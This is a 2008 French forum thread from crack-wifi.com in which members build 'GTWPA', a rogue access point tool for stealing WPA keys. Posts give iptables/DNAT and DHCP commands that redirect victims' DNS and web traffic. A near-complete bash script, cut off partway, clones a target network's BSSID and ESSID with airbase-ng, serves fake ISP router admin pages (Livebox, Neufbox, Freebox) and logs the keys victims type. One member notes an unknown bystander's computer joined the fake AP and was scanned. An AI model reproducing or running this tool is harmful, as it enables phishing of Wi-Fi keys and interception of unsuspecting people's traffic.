Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 27-11-2008 12:43:48

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Bon, il va falloir que je m'améliore sérieusement en bash alors smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 27-11-2008 17:50:44

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

J'ai testé le passage en live du mode transparent à non transparent, puis transparent à nouveau.

C'est assez efficace, une victime connectée à la rogue peut surfer tranquillement et on peut tout d'un coup envoyer toutes ses requêtes vers notre serveur http, puis ensuite remettre le mode "surf".

Hors Ligne

#28 27-11-2008 18:46:06

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Super intéressant smile

Comment tu procèdes? Ca pourrait etre pas mal que le tool bascule automatiquement en mode transparent une fois l'info key récupérée, et lance un petit sniffing d'informations avec httpcapture par exemple.

Hors Ligne

#29 27-11-2008 19:51:11

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Une fois airbase lancé, il y a une partie commune aux 2 FakeAP :

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
cd /
cd etc
echo > dhcpd.leases
killall dhcpd
dhcpd -cf dhcpd.conf -lf dhcpd.leases at0

Ensuite ça diffère entre la transparente :

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.0.1
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Et la non transparente :

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80
apachectl -f /root/Desktop/RogueAP/httpd.conf -k start
cd /root/Desktop/RogueAP/dnspoison
java ServerKernelMain 10.0.0.1 10.0.0.1

Il suffit de jongler entre ces 2 différentes parties pour basculer de l'une à l'autre.

Hors Ligne

#30 27-11-2008 20:00:48

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Ca va prendre du temps, mais je sens qu'on va pouvoir développer un très joli petit tool avec tout ça big_smile Merci pour ces infos Atrax, tu es notre spécialiste de la rogue ap avec airbase-ng smile

Hors Ligne

#31 27-11-2008 20:13:29

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Mais j'avance lentement à cause de problème de connexion avec le wifi sous linux, c'est vraiment la misère, alors que sous windows c'est nikel. Je sais plus quoi faire.

Hors Ligne

#32 28-11-2008 09:59:12

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

M1ck3y tu peux me dire si chez toi ça fonctionne en mettant ton alfa 500 en rogue ? Parce que chez moi ça ne marche pas et je ne sais pas si c'est un problème qui m'est spécifique ou non.

Ou quelqu'un d'autre qui a une alfa, pourrait-il tester ?

Hors Ligne

#33 28-11-2008 12:46:39

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Je vais essayer de tester ça ce weekend, et je poste le feedback wink

Hors Ligne

#34 29-11-2008 00:26:22

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Bon, j'ai commencé à faire le design pour la page de statistiques GTWPA... en fait, je bloque sur le logo, j'ai aucune inspiration hmm

Essai 1 :
71nk5arbd22j2uy4i1bo.png

Essai 2 :
nv4w2hvv9xpapj88jey1.png

Des idées, des remarques... ?

Tiens, d'ailleurs, il me faudrait quelques informations sur le fonctionnement du script... où seront extraits les fichiers de rogue ap ? dans /root ? /root/GTWPA ? /root/GTWPA/rogues ? Où  sera déposé la page de statistiques..? Y aura-t-il un fichier de log à afficher dans cette 'page' ? Enfin bon, j'aimerais bien un supplément d'informations sur les pages de rogue AP.... smile !


Merci !


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

#35 29-11-2008 00:50:55

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Wow c'est la grande classe ton design smile

Aucune remarque, non là il n'y a rien à dire ça en jette. Bon, il va falloir que le tool soit à la hauteur...

Tu fais bien d'évoquer le sujet, justement il faudrait qu'on se concerte là dessus. Alors voila comment je pense procéder. L'utilisateur télécharge le script. C'est le script qui va downloader les différents fichiers, et créer les dossiers. La base, ce sera /root/GTWPA. Là dedans, on aura /root/GTWPA/server qui contiendra /root/GTWPA/server/rogue (les pages qui sont utilisées actuellement, et dont le contenu sera effacé à chaque démarrage ou arret du script, ou via une fonction de "réinitialisation"), et /root/GTWPA/server/backup qui contiendra les différents pages, chacune dans son dossier par exemple /root/GTWPA/server/backup/Livebox pour toutes les pages Livebox. Le script ira tout simplement copier le contenu du dossier /root/GTWPA/server/backup/Livebox dans /root/GTWPA/server/rogue lorsque l'utilisateur choisira lors de la préparation de configurer une rogue ap de type Livebox.

Pour la page de stats, je pense que /root/GTWPA/stats/stats.php fera parfaitement l'affaire. La page devra afficher le contenu du fichier /root/GTWPA/logs/log.txt, ce fichier contiendra, à chaque validation de la clé sur une page de la rogue ap:

-la date et heure
-la variable essid
-la clé

En fait, je ne sais pas trop encore comment implémenter l'utilisation des modes dans la commande, comme on en avait discuté précédemment. Je ne sais pas encore non plus comment on va récupérer les infos pour les écrire dans le fichier log, il va falloir que je planche la dessus. Il faudrait que je te fasse un petit script d'exemple ce weekend, pour que tu puisse voir si on peut améliorer ça (j'ai un niveau très basique en bash hmm ).

Hors Ligne

#36 29-11-2008 12:21:32

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Aller hop, un dernier petit essai pour la route smile :
f63e661a03ff6dfe53b447075cbce2f7.png

Bon, et bien merci pour ces informations... maintenant il ne me reste plus qu'à coder... l'avantage, c'est que je n'ai  pas besoin de rendre cette page compatible IE, ce qui m'enlève 50% du boulot lol !

Dernière modification par Tite-Live (29-11-2008 17:35:01)


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

#37 29-11-2008 21:19:18

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Bon, je me suis remis en mode test d'airbase-ng. J'ai beau faire, mon client XP est accroché à son AP légitime comme une moule sur son rocher, j'ai beau lui envoyer des déauth, il ne se connecte pas à ma rogue.

Je ne peux donc meme pas tester les différents scripts qu'on 'a donné pour le dhcp et la redirection vers le serveur rogue. C'est très énervant, je ne vois pas trop ce qui me bloque comme ça. Je vais essayer de baisser le Tx power de mon AP, comme il est assez puissant ça ne permet peut etre pas à la rogue de prendre le dessus.

Je t'encourage à poursuivre les tests Atrax, là on a vraiment besoin de toi pour avoir les commandes fonctionnelles avec airbase-ng, en fait maintenant que tu as réussi à configurer ta rogue ap fonctionnelle, il faudrait étudier le filtrage, histoire de ne pas ramener tous les clients environnants vers la rogue, mais seulement le client ciblé. Sur la description d'airbase-ng, il y a des options de filtrage en fonction du canal, de l'encryption etc, les as tu déja utilisées?

Par exemple, sur ma config de test en WPA TKIP, j'utilise -z 2 (bon ça ne fonctionne pas encore, je m'y remet).

Hors Ligne

#38 29-11-2008 21:56:16

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Ben en fait je suis en plein test.
J'ai remis ma le bridge eth0 sur VMWare et mon Alfa 500 en rogue, et ça a l'air de marcher !!

Victime >> Alfa500 (wlan0) >>> Backtrack3 VMware (eth0) >>>> Windows VISTA connecté à internet (Livebox)

Alors je me connecte sous un WinXP lui aussi en vmware avec ma clé usb wifi TPLink (rausb0) et je peux surfer sur internet.

Sur le XP de test ma clé TPLink était connectée sur un autre réseau, dès que je l'ai déconnectée, elle s'est immédatement connectée à la RogueAP.

J'ai d'ailleurs capté un autre ordinateur inconnu ayant l'adresse ip 10.0.0.253 (la .254 etant mon xp)
Sous wireshark je vois qu'il fait beaucoup de requetes ARP comme s'il ne pouvait pas surfer, mais j'ai pourtant vu beaucoup de requete dns vers plein de sites francais.

Il s'agit d'un Vista Pro comme me l'indique le scanner SMB de Metasploit 3.

ATTENTION : je crois bien que rien ne marche quand on est connecté à internet par numericable !! Problème de dns on dirait. Mais tout marche avec un Livebox et une Neufbox.

Pour ceux qui ont BT3 sous VMWare (avec eth0 bridge), comment on fait pour relancer eth0 quand on a changé de connexion sur l'hôte (ici vista) ? Parce je reboot ma BT3 a chaque fois c'est pas très pratique !

merci

Hors Ligne

#39 29-11-2008 22:07:35

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

HoOo... La rogue qui fonctionne avec l'alfa? Ca c'est une très bonne nouvelle! Tiens nous au courant de tes tests, et si tu as des news sur le filtrage (histoire ne ne pas ramener un "intru" sur la rogue, comme ça a été le cas lors de ton test), n'hésite pas à nous le faire savoir.

Pour relancer eth0, j'utilise BT NETWORK MANAGER: script de gestion eth0 pour Backtrack 3 Final. C'est assez pratique. Tu le mets dans /usr/bin, et comme ça dès que tu as besoin de reconfigurer ton eth0 il te suffit de lancer

network.sh

Allez, je retourne à mes tests moi aussi smile

Hors Ligne

#40 29-11-2008 23:00:29

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Merci, j'avais déjà vu, et je me suis scripté un truc du même genre sauf qu'il faut toujours rentrer les infos à la main, je préfère encore rebooter tongue.

Ou alors ce mettre en NAT plutot qu'en bridge... faudra que je teste.

Hors Ligne

#41 30-11-2008 11:59:02

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Bon j'ai amélioré le script GTWPA.
GTWPA.tar.gz

Décompressez dans /root
Editez sc2-dnspoison.sh et changez les 3 premiers paramètres selon votre config
Dans un shell lancez sc1-airbase.sh
Dans un 2e shell lancez sc2-dnspoison.sh

Suivez les instructions tongue

C'est loin d'être fini et adaptable, reste à jouer avec les paramètres d'airbase, vérifier que les scripts php des fausses box fonctionnent, et enfin pouvoir choisir l'interface (par défaut j'ai mis neufbox).

La partie la plus technique est faite je pense, j'attends les feedbacks.

Limitation : Pour l'instant pas de connexion internet vers Numéricable (routeur Netgear), soit à cause du routeur soit à cause de Numéricable (technologie différente de l'adsl et pas de "box" comme en adsl). A tester sur des box avec routeur et/ou vers Numéricable !

Hors Ligne

#42 30-11-2008 13:57:05

Djembadi
Membre Hyperactif
Inscription : 15-11-2008
Messages : 51

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Je sait pas si ça peut aider mais j'ai modifié une image de la page d'accueil d'un modem netgear (il suffit de rajouter 2 champs de texte : un pour le login, un pour le passe).
le lien :
http://rapidshare.com/files/168844792/Page.rar

Hors Ligne

#43 30-11-2008 14:13:00

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

En fait je parlais de la Rogue Transparente, celle qui permet à la victime de surfer sur le net. Ca ne fonctionne pas quand je suis connecté sur Numéricable.

Hors Ligne

#44 30-11-2008 19:16:21

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Super boulot Atrax wink

De mon coté, j'ai scripté la base de notre tool. Je n'ai pas inclu les attaques airbase-ng, il y a de la place pour ton taf smile

Voila ce que ça donne:

-----------------------------------------------------\n
---_____________________------____________--_____----\n
--/--_____/\__----___/--\----/--\______---\/--_--\---\n
-/---\--___--|----|--\---\/\/---/|-----___/--/_\--\--\n
-\----\_\--\-|----|---\--------/-|----|--/----|----\-\n
--\______--/-|____|----\__/\--/--|____|--\____|__--/-\n
---------\/-----------------\/-------------------\/--\n
-----------------------------------------------------\n
----------------~ Innovative WPA TOOL ~--------------\n
----~ Rogue AP/Fake Admin Panel WPA Key Grabber ~----\n
----------------~ Brought to you by ~----------------\n
------~ Atrax, M1ck3y, Tite-Live, Webcapitain ~------\n
-----------------------------------------------------\n
------------------ \033[01;34mwww.crack-wifi.com\033[0m -----------------\n
-----------------------------------------------------\n"

Le menu principal (à faire évoluer au besoin):

echo "--> Veuillez Entrer Votre Choix:"
echo
echo "--> 1 Installation de GTWPA"
echo "--> 2 Préparation de la Rogue AP"
echo "--> 3 Démarrage de la Rogue AP (Apache)"
echo "--> 4 Vérification de la Rogue AP (Test serveur local)"
echo "--> 5 Arret de la Rogue AP (Apache)"
echo "--> 6 Attaque airbase-ng GTWPA Non Transparente (Victime vers HTTP local)"
echo "--> 7 Attaque airbase-ng GTWPA Transparente (Victime vers connexion Internet)"
echo "--> 8 Statistiques GTWPA"
echo
echo "--> Votre Choix:"
read choix

La partie serveur est ok, tout s'installe correctement, lors de la préparation de la rogue AP l'archive choisie est copiée puis décompressée à la racine du serveur, le fichier essid.txt est modifié en fonction de ce que valide l'utilisateur, donc ça roule. Il faudrait incorporer les attaques airbase-ng (je n'ai pas eu le temps de scripter davantage aujourd'hui) et poursuivre le boulot avec la page de stats et la récupération des date/time, essid et clés wpa dans le fichier log.txt.

C'est un début, il faut bien commencer sur une base, voici donc le script: GTWPA version 0.1 beta-test. Tout n'est pas fonctionnel, il y a énormément de choses à améliorer et on a encore du boulot... Mais pour la partie serveur, ça roule big_smile

Tite-Live, si tu peux jeter un oeil et me dire si il y a moyen de jongler avec les variables pour que le script puisse appeler des $0 $1 $2 $3 etc... Là j'ai scripté à ma manière, mais en travaillant sur les variables on peut surement améliorer tout ça.

Hors Ligne

#45 30-11-2008 20:18:10

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

chmod 777 /root/GTWPA/server/rogue
Ca met juste le répertoire en écriture, mais les fichiers à l'intérieur aussi ?

Pour le serveur apache tu utilises start-apache, mais ça nécessite de clicker sur un message, pareil quand on le stop, c pour ca que j'ai utilisé la command "apachectl" c peut etre mieux

Dans installation, faut prévoir mise a jour car je suppose que les pages web seront en évolution constantes.

Marant ton script d'install avec les pourcentages. Je cherche un truc du style sur des scripts avancés justement, c'est pas avec mes codes de débutants que j'y arrive tongue.

Voila les premières idées qui me viennent smile

Hors Ligne

#46 30-11-2008 20:26:23

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

M1ck3y a écrit :

La partie serveur est ok, tout s'installe correctement, lors de la préparation de la rogue AP l'archive choisie est copiée puis décompressée à la racine du serveur, le fichier essid.txt est modifié en fonction de ce que valide l'utilisateur, donc ça roule. Il faudrait incorporer les attaques airbase-ng (je n'ai pas eu le temps de scripter davantage aujourd'hui) et poursuivre le boulot avec la page de stats et la récupération des date/time, essid et clés wpa dans le fichier log.txt.

C'est un début, il faut bien commencer sur une base, voici donc le script: GTWPA version 0.1 beta-test. Tout n'est pas fonctionnel, il y a énormément de choses à améliorer et on a encore du boulot... Mais pour la partie serveur, ça roule big_smile

Tite-Live, si tu peux jeter un oeil et me dire si il y a moyen de jongler avec les variables pour que le script puisse appeler des $0 $1 $2 $3 etc... Là j'ai scripté à ma manière, mais en travaillant sur les variables on peut surement améliorer tout ça.

Wahou beau boulot ! ça avance bien tout ça smile
Pour les variables $1 &co, je m'en occupe dès que j'ai fini la page de stats (mardi soir certainement smile )


Bon codage !


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

#47 30-11-2008 20:56:18

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Oups, j'avais oublié que la page Neufbox incluait la possibilité de rentrer une adresse mac. Voila, c'est ajouté dans le script. Bon, alors tout a l'air fonctionnel coté serveur, excepté un bug d'affichage de tes pages Tite-Live. Il va falloir trouver d'ou ça vient...

Voila, sinon ce n'est qu'un premier script de test, et honnetement je suis très loin d'etre un grand codeur (je me qualifierai meme de total n00b dans ce domaine lol ) donc si tu veux améliorer un peu tout ça Atrax, c'est avec plaisir, et pareil pour Tite-Live, c'est notre projet et c'est en travaillant ensemble qu'on en fera un bon outil smile

Hors Ligne

#48 30-11-2008 22:51:10

seb-taz
Membre
Inscription : 28-11-2008
Messages : 17

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

merci pour le clin d'œil wink
bon du coup je m'y suis essayé aussi alors je vous met le script si ça peut aider un peu :

EDIT : voila une version complète à tester

#!/bin/bash
# Grand Theft WPA v0.1-betatest
# Merci à tous ceux qui bossent sur le projet:
# Atrax, M1ck3y, Tite-live, Webcapitain... Et Seb-taz qui est trop discret sur le forum lol
#
# Aidez nous à développer ce tool wink

# intro
intro="\n
-----------------------------------------------------\n
---_____________________------____________--_____----\n
--/--_____/\__----___/--\----/--\______---\/--_--\---\n
-/---\--___--|----|--\---\/\/---/|-----___/--/_\--\--\n
-\----\_\--\-|----|---\--------/-|----|--/----|----\-\n
--\______--/-|____|----\__/\--/--|____|--\____|__--/-\n
---------\/-----------------\/-------------------\/--\n
-----------------------------------------------------\n
----------------~ Innovative WPA TOOL ~--------------\n
----~ Rogue AP/Fake Admin Panel WPA Key Grabber ~----\n
----------------~ Brought to you by ~----------------\n
------~ Atrax, M1ck3y, Tite-Live, Webcapitain ~------\n
-----------------------------------------------------\n
------------------ \033[01;34mwww.crack-wifi.com\033[0m -----------------\n
-----------------------------------------------------\n"


# Choix d'Action
clear
echo -e $intro
echo "--> Veuillez Entrer Votre Choix:"
echo
echo "--> 1 Installation de GTWPA"
echo "--> 2 Préparation de la Rogue AP"
echo "--> 3 Démarrage de la Rogue AP (Apache)"
echo "--> 4 Vérification de la Rogue AP (Test serveur local)"
echo "--> 5 Arret de la Rogue AP (Apache)"
echo "--> 6 Attaque airbase-ng GTWPA Non Transparente (Victime vers HTTP local)"
echo "--> 7 Attaque airbase-ng GTWPA Transparente (Victime vers connexion Internet)"
echo "--> 8 Autopwn du client"
echo "--> 9 Statistiques GTWPA"
echo
echo "--> Votre Choix:"
read choix

case $choix in
#Installation de GTWPA
1)
clear
echo -e $intro
echo -e "--> Installation de GTWPA (supprime /root/GTWPA):"
echo -e "--> Début de l'installation dans 5 s"
sleep 1
clear
echo -e $intro
echo -e "--> Installation de GTWPA (supprime /root/GTWPA):"
echo -e "--> Début de l'installation dans 4 s"
sleep 1
clear

echo -e $intro
echo -e "--> Installation de GTWPA (supprime /root/GTWPA):"
echo -e "--> Début de l'installation dans 3 s"
sleep 1
clear
echo -e $intro
echo -e "--> Installation de GTWPA (supprime /root/GTWPA):"
echo -e "--> Début de l'installation dans 2 s"
sleep 1
clear
echo -e $intro
echo -e "--> Installation de GTWPA (supprime /root/GTWPA):"
echo -e "--> Début de l'installation dans 1 s"
sleep 1
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 0%[>]"
# nettoyage
rm -f -r /root/GTWPA
# on crée l'arborescence
mkdir /root/GTWPA
mkdir /root/GTWPA/server
mkdir /root/GTWPA/server/backup
mkdir /root/GTWPA/server/rogue
mkdir /root/GTWPA/stats
mkdir /root/GTWPA/conf
mkdir /root/GTWPA/logs

#On download les archives des pages fake
cd /root/GTWPA/server/backup
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 0%[>               ]"
echo -e
wget http://www.crack-wifi.com/tl/Numericable.tar.gz
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 20%[===>            ]"
echo -e
wget http://www.crack-wifi.com/tl/Freebox.tar.gz
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 40%[======>         ]"
echo -e
wget http://www.crack-wifi.com/webcapitain/rogue_php.zip
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 60%[=========>      ]"
echo -e
wget http://www.crack-wifi.com/webcapitain/neuf_php.zip
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 80%[============>   ]"
echo -e
wget http://www.crack-wifi.com/tl/Speedtouch.tar.gz
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 90%[=============>  ]"
echo -e
wget http://www.crack-wifi.com/tl/Neufbox.tar.gz
#On download les autres fichiers et on crée le fichier de log (vide pour l'instant)
cd /root/GTWPA/stats
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 95%[==============> ]"
echo -e
wget http://www.crack-wifi.com/tl/conf/stats.txt
mv stats.txt stats.php
cd /root/GTWPA/conf
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 95%[==============> ]"
echo -e
wget http://www.crack-wifi.com/tl/conf/httpd.conf
cd /root/GTWPA/logs
> log.txt
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 100%[===============>]"
echo -e
sleep 3
clear
echo -e $intro
echo -e "--> Installation terminée .....(enfin presque )"
# fichiers airbase
cd /root
wget http://atraxorg.free.fr/GTWPA.tar.gz
tar -xf GTWPA.tar.gz
#copie du dhcpd.conf
echo "ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.10 10.0.0.100;
range 10.0.0.150 10.0.0.200;
}">/etc/dhcpd.conf

cd /root/Desktop
sleep 4
$0;;
#Preparation de la rogue ap (choix du fake panel admin, decompression de l'archive dans /root/GTWPA/server/rogue, modif de l'essid.txt et chmod 777 /root/GTWPA/server/rogue)
2)
clear
echo -e $intro
echo -e "--> Preparation de la Rogue AP"
# nettoyage des tables
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# RAZ processus
killall -9 dhcpd tcpdump airbase-ng httpd wpa_supplicant dhclient
modprobe -r ipwraw && modprobe iwl3945
# analyse de l'environnement
iwconfig | grep 802.11
# specifique intel 3945
modprobe -r iwl3945 && modprobe ipwraw
# déclaration de variable
echo "carte wifi:"
read carte
#passage mode monitor
modprobe tun
airmon-ng start $carte &&
# choix de l'interface injection obligatoire puisque les nouveau drivers crée des interfaces mon*
echo "carte injection?"
read inject
export inject
# selection de la cible
konsole --noclose -e airodump-ng $inject &

echo "bssid ?"
read bssid
export bssid
echo "channel?"
read chan
export chan
echo "essid?"
read essid
export essid
# configuration du serveur
type=${essid:0:4}
#

if [ "$type" = "Nume" ] ; then
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/Numericable.tar.gz /root/GTWPA/server/rogue
cd /root/GTWPA/server/rogue
tar -xf Numericable.tar.gz
sed -i "s/NUMERICABLE-BOL4/$essid/g" essid.txt
chmod 777 /root/GTWPA/server/rogue
cd /root/Desktop
clear
echo -e $intro
echo -e "--> Rogue AP configurée"
echo
echo "--> Type: Numericable"
echo "--> Essid: $essid"
sleep 5
$0
elif [ "$type" = "free" ] ; then
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/Freebox.tar.gz /root/GTWPA/server/rogue
cd /root/GTWPA/server/rogue
tar -xf Freebox.tar.gz
sed -i "s/Freebox-Maison/$essid/g" essid.txt
chmod 777 /root/GTWPA/server/rogue
cd /root/Desktop
clear
echo -e $intro
echo -e "--> Rogue AP configurée"
echo
echo "--> Type: Freebox"
echo "--> Essid: $essid"
sleep 5
$0
elif [ "$type" = "Live" ] ; then
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/rogue_php.zip /root/GTWPA/server/rogue
cd /root/GTWPA/server/rogue
unzip rogue_php.zip
sed -i "s/liveboxmachin/$essid/g" essid.txt
chmod 777 /root/GTWPA/server/rogue
cd /root/Desktop
clear
echo -e $intro
echo -e "--> Rogue AP configurée"
echo
echo "--> Type: Livebox"
echo "--> Essid: $essid"
sleep 5
$0
elif [ "$type" = "SFR-" ] ; then
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/neuf_php.zip /root/GTWPA/server/rogue
cd /root/GTWPA/server/rogue
unzip neuf_php.zip
sed -i "s/essid_test/$essid/g" essid.txt
sed -i "s/00:11:22:33:44:55/$bssid/g" bssid.txt
chmod 777 /root/GTWPA/server/rogue
cd /root/Desktop
clear
echo -e $intro
echo -e "--> Rogue AP configurée"
echo
echo "--> Type: SFR-Neufbox"
echo "--> Essid: $essid"
echo "--> Adresse mac: $bssid"
sleep 5
$0
elif [ "$type" = "Spee" ] ; then
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/Speedtouch.tar.gz /root/GTWPA/server/rogue
cd /root/GTWPA/server/rogue
tar -xf Speedtouch.tar.gz
sed -i "s/Speedtouch-503C/$essid/g" essid.txt
chmod 777 /root/GTWPA/server/rogue
cd /root/Desktop
clear
echo -e $intro
echo -e "--> Rogue AP configurée"
echo
echo "--> Type: Tele2box Speedtouch"
echo "--> Essid: $essid"
sleep 5
$0
elif [ "$type" = "neuf" ] ; then
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/Neufbox.tar.gz /root/GTWPA/server/rogue
cd /root/GTWPA/server/rogue
tar -xf Neufbox.tar.gz
sed -i "s/Indéterminé/$essid/g" essid.txt
sed -i "s/Indéterminée/$bssid/g" mac.txt
chmod 777 /root/GTWPA/server/rogue
cd /root/Desktop
clear
echo -e $intro
echo -e "--> Rogue AP configurée"
echo
echo "--> Type: Neufbox originale"
echo "--> Essid: $essid"
echo "--> Adresse mac: $bssid"
sleep 5
$0
fi
$0;;
#Start Apache
3)
clear
echo -e $intro
echo -e "--> Démarrage du serveur Apache"
echo -e "--> Fichier de configuration: /root/GTWPA/conf/httpd.conf"
sleep 5
killall -9 httpd
httpd -f /root/GTWPA/conf/httpd.conf
clear
echo -e $intro
echo -e "--> Serveur Apache up &running"
echo -e "--> Let's go grabbing some WPA keys wink"
sleep 5
$0;;
#Test Local
4)
clear
echo -e $intro
echo -e "--> Test du serveur local Apache"
echo -e "--> Visualisation de http://127.0.0.1"
sleep 5
firefox 127.0.0.1
$0;;
#Stop Apache
5)
clear
echo -e $intro
echo -e "--> Arret du serveur Apache"
echo -e "--> Fichier de configuration: /root/GTWPA/conf/httpd.conf"
sleep 5
# nettoyage des tables
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# RAZ processus
killall -9 dhcpd tcpdump airbase-ng httpd wpa_supplicant dhclient wicd wicd-monitor wicd-client dhclient airodump-ng
modprobe -r ipwraw && modprobe iwl3945
clear
echo -e $intro
echo -e "--> Serveur Apache down"
echo -e "--> La peche est elle bonne? wink"
sleep 3
$0;;
#Test Local
6)
clear
echo -e $intro
echo -e "--> Attaque airbase-ng GTWPA Non Transparente (Victime vers HTTP local)"
#création point d'accès
iwconfig $inject rate 54M
iwconfig $inject channel $chan
airbase-ng $inject -a $bssid -F capture &
sleep 2
# configuration du PA
iwconfig | grep at
export at
ifconfig at0 up &&
ifconfig at0 10.0.0.1 &&
cd /
cd etc
echo > dhcpd.leases
killall dhcpd
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80
konsole --workdir /root/GTWPA/dnspoison/ -e sh -c "java ServerKernelMain 10.0.0.1 10.0.0.1" &
dhcpd -q -cf /etc/dhcpd.conf at0 &&
clear
sleep 5
$0;;
#Test Local
7)
clear
echo -e $intro
echo -e "--> Attaque airbase-ng GTWPA Transparente (Victime vers connexion Internet)"
echo "paramètres de votre carte réseau connectée à internet"
echo "adresse ip de votre routeur?"
read routeur
export routeur
echo "interface a utiliser?"
read inet
export inet
#création point d'accès
iwconfig $inject rate 54M
